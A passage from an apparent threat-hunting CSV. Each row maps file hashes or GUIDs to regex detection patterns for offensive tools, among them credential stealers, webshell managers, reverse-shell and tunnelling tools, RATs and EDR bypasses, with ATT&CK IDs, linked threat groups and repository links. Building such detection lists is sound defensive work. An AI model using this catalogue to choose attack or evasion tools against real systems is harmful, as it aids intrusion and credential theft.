from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28916" "*72943e841e721066a5db4d3c3c3e03bfcf3cc275802893e1bd678723e7c82ede*",".{0,1000}72943e841e721066a5db4d3c3c3e03bfcf3cc275802893e1bd678723e7c82ede.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28917" "*72946b61b5eb5c362bd560d045eeb9edd267715c2abb443886870ebb5becef31*",".{0,1000}72946b61b5eb5c362bd560d045eeb9edd267715c2abb443886870ebb5becef31.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28918" "*729ed6976b1710e57fb5e486e1a017b39a437895ae86056c2aa3d45763a6f330*",".{0,1000}729ed6976b1710e57fb5e486e1a017b39a437895ae86056c2aa3d45763a6f330.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#filehash","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","28919" "*72a7649ea0ac981b6bb32dbbe52f3dc76ffc61c10f0e1ed04014ffa8525cc231*",".{0,1000}72a7649ea0ac981b6bb32dbbe52f3dc76ffc61c10f0e1ed04014ffa8525cc231.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28920" "*72af248c9e2b92add20bde3532f73569fe2c3e941fd12c72f13696f6ccd60813*",".{0,1000}72af248c9e2b92add20bde3532f73569fe2c3e941fd12c72f13696f6ccd60813.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28921" "*72b2d05cbbdea293859fc1a06651a3932c4b72675a0e014ad91a3b413cbd15c4*",".{0,1000}72b2d05cbbdea293859fc1a06651a3932c4b72675a0e014ad91a3b413cbd15c4.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","28922" "*72b675d40bc3c796892caef0581456f9a489e7195527f67ea5b819dac372e89a*",".{0,1000}72b675d40bc3c796892caef0581456f9a489e7195527f67ea5b819dac372e89a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","28923" "*72c3a786661ee9742cf1d0e3b99b89e976911ed87971695f08487cf42d7fc29d*",".{0,1000}72c3a786661ee9742cf1d0e3b99b89e976911ed87971695f08487cf42d7fc29d.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password 
recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","28927" "*72ca2211283a4596dbd2881e3cbd8fb8f07420e0b7404bb298eab30873f487ed*",".{0,1000}72ca2211283a4596dbd2881e3cbd8fb8f07420e0b7404bb298eab30873f487ed.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","28928" "*72cb6dcc8251f18f112f983804a34dc1f651c87614c18ced8a8f0ccf614bca80*",".{0,1000}72cb6dcc8251f18f112f983804a34dc1f651c87614c18ced8a8f0ccf614bca80.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","28930" "*72ce22f23461dffa813c1a36c37ae081664ee255cbaf0e4b87d5108ab3101df2*",".{0,1000}72ce22f23461dffa813c1a36c37ae081664ee255cbaf0e4b87d5108ab3101df2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28931" "*72d57c0c42ccd4ec3a220ac3c91cbb49b25cfcabebd30e36539980b52cfd49a4*",".{0,1000}72d57c0c42ccd4ec3a220ac3c91cbb49b25cfcabebd30e36539980b52cfd49a4.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","28935" "*72d6fef7a943dfe5632fca4c573e041367b14f2211770fd7ac4c73955c865dce*",".{0,1000}72d6fef7a943dfe5632fca4c573e041367b14f2211770fd7ac4c73955c865dce.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28936" "*72d88f37a4b06a1369b21be40f93b18e929529a0cbffb29b91959582aac23073*",".{0,1000}72d88f37a4b06a1369b21be40f93b18e929529a0cbffb29b91959582aac23073.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28937" "*72dcd04c582db154eee02cde9a14312542b86615a88bf47d6529b26f8c87914c*",".{0,1000}72dcd04c582db154eee02cde9a14312542b86615a88bf47d6529b26f8c87914c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the 
bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28938" "*72DCE01A-B6EC-4AC3-A98B-D5C44D532626*",".{0,1000}72DCE01A\-B6EC\-4AC3\-A98B\-D5C44D532626.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#GUIDProject","N/A","9","","N/A","","","","28939" "*72e0ca8ac2312f9bda3badfc199df5bd0a224dcbdfa681a6fda0e3f5a774f7b6 ? ?*",".{0,1000}72e0ca8ac2312f9bda3badfc199df5bd0a224dcbdfa681a6fda0e3f5a774f7b6\s?\s?.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#filehash","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","28941" "*72e57ac71f5d1bdb6b575ad08a0677bf555fdecdc30469f0b41fcd6d7272c1f5*",".{0,1000}72e57ac71f5d1bdb6b575ad08a0677bf555fdecdc30469f0b41fcd6d7272c1f5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28942" "*72e79a2845a4d62e94a059a4f90e1ee1eff06ae329773097e5115a45fbb9a9a1*",".{0,1000}72e79a2845a4d62e94a059a4f90e1ee1eff06ae329773097e5115a45fbb9a9a1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - 
T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28943" "*72eec1e82c566ff08110a4d06cd5b06cc82c67419131ad52fc537ff5552f69ab*",".{0,1000}72eec1e82c566ff08110a4d06cd5b06cc82c67419131ad52fc537ff5552f69ab.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","28944" "*72ef1c32661b8307cce495c40dd511c6ff5a55d0c94d82f72224410443172e1f*",".{0,1000}72ef1c32661b8307cce495c40dd511c6ff5a55d0c94d82f72224410443172e1f.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","28945" "*72efc44a791fceb9bc6e602fc079c8bf8139024dec0e580ed15f8c4fe80457bd*",".{0,1000}72efc44a791fceb9bc6e602fc079c8bf8139024dec0e580ed15f8c4fe80457bd.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","28946" "*72f7e33c5313aa5ab15b99778b1f3c4d50d4710b171a635994d0d01e47e8173b*",".{0,1000}72f7e33c5313aa5ab15b99778b1f3c4d50d4710b171a635994d0d01e47e8173b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28947" "*7307d71219a8bf7b0d62ab2975d4ea397dbcf3f277f3e4cdbcea58fe08f55b36*",".{0,1000}7307d71219a8bf7b0d62ab2975d4ea397dbcf3f277f3e4cdbcea58fe08f55b36.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28949" "*73090c936c651512967306fe08af95b5ad4272012902fa53570806dd290b02f3*",".{0,1000}73090c936c651512967306fe08af95b5ad4272012902fa53570806dd290b02f3.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - 
TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","28950" "*730b62e8a099a320ff72caf2e758cb15b04cbb123cd9fe8cc72dcffd80b8f214*",".{0,1000}730b62e8a099a320ff72caf2e758cb15b04cbb123cd9fe8cc72dcffd80b8f214.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28951" "*73141d2560cc8922220ff44a83d36aa79e759ae349dea6300cf6c4adde81982d*",".{0,1000}73141d2560cc8922220ff44a83d36aa79e759ae349dea6300cf6c4adde81982d.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","28952" "*7315b2a962905112c0a7172a5efbd5392d27b059a7c4a035eb38e39bcf2e19d1*",".{0,1000}7315b2a962905112c0a7172a5efbd5392d27b059a7c4a035eb38e39bcf2e19d1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28953" "*732211ae-4891-40d3-b2b6-85ebd6f5ffff*",".{0,1000}732211ae\-4891\-40d3\-b2b6\-85ebd6f5ffff.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - 
Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","#GUIDproject","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","28954" "*73226E13-1701-424E-A4F2-3E4D575A1DD0*",".{0,1000}73226E13\-1701\-424E\-A4F2\-3E4D575A1DD0.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","28955" "*73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f*",".{0,1000}73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","28956" "*73273aa4152acec4126a3cb03e1b5afb4198e24bf3e71d426c3b14fc3dc066db*",".{0,1000}73273aa4152acec4126a3cb03e1b5afb4198e24bf3e71d426c3b14fc3dc066db.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28957" 
"*7331b5c04c58757162a4448cc22df3483cbc4c38823a0e11026830f6cdfabf75*",".{0,1000}7331b5c04c58757162a4448cc22df3483cbc4c38823a0e11026830f6cdfabf75.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","28959" "*733238cfadd968469af3b91b6aa772958604f9bb1f3808ee7f5cb9870ddabdcb*",".{0,1000}733238cfadd968469af3b91b6aa772958604f9bb1f3808ee7f5cb9870ddabdcb.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","28960" "*733366cd878504e71534180b9d93fa01139ff82e4cd2f61b15f1de71bd292fa7*",".{0,1000}733366cd878504e71534180b9d93fa01139ff82e4cd2f61b15f1de71bd292fa7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28961" "*733a16c2eb4095398eab1a92ca5cea56a935f3df05a100fec3a1decda26d1e3f*",".{0,1000}733a16c2eb4095398eab1a92ca5cea56a935f3df05a100fec3a1decda26d1e3f.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","28963" "*733b028d3299bcdcb8998b97939f0b57da0c66b62f52dbb48c29ca29b5c52b9a*",".{0,1000}733b028d3299bcdcb8998b97939f0b57da0c66b62f52dbb48c29ca29b5c52b9a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28964" "*733C37D8-858F-44EE-9D17-790F7DE9C040*",".{0,1000}733C37D8\-858F\-44EE\-9D17\-790F7DE9C040.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - 
T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","28965" "*733dafd81c4cd0b7f5daa7b44a543a73a7e68587c006523c5ba12b017b1a2e69*",".{0,1000}733dafd81c4cd0b7f5daa7b44a543a73a7e68587c006523c5ba12b017b1a2e69.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","28967" "*733fe0591092a284f149d186d66f2435a6196769cd34f65909a23bdf1e907d84*",".{0,1000}733fe0591092a284f149d186d66f2435a6196769cd34f65909a23bdf1e907d84.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28968" "*73415a38d4b76dd2215d9fd81015b36a025018552f7847494f908f50c62fc8d2*",".{0,1000}73415a38d4b76dd2215d9fd81015b36a025018552f7847494f908f50c62fc8d2.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","#filehash","N/A","10","7","614","69","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z","28969" "*734c3a8ec0d442a49c7909702012c50ab2db32cfed02e82b5c19a5afda5a87d3*",".{0,1000}734c3a8ec0d442a49c7909702012c50ab2db32cfed02e82b5c19a5afda5a87d3.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","28970" "*73510d6bd5ae0d698d510c6ed240d7e5cefd0a2111a3123ff68ef63329bafece*",".{0,1000}73510d6bd5ae0d698d510c6ed240d7e5cefd0a2111a3123ff68ef63329bafece.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal 
- AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28972" "*73694f7f3a47359e3135c4da6e4eaab957047d9fc08ee8f0367d2beb5df4ca2f*",".{0,1000}73694f7f3a47359e3135c4da6e4eaab957047d9fc08ee8f0367d2beb5df4ca2f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28974" "*736b362973af7010de9bf1cea58547a17a236e81a2084c344cf06a1b184698bb*",".{0,1000}736b362973af7010de9bf1cea58547a17a236e81a2084c344cf06a1b184698bb.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","#filehash","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","28975" "*736c69887df76672923ad7ae8b1b1754f13f96d3ae5e2eea7259e29163af71d0*",".{0,1000}736c69887df76672923ad7ae8b1b1754f13f96d3ae5e2eea7259e29163af71d0.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential 
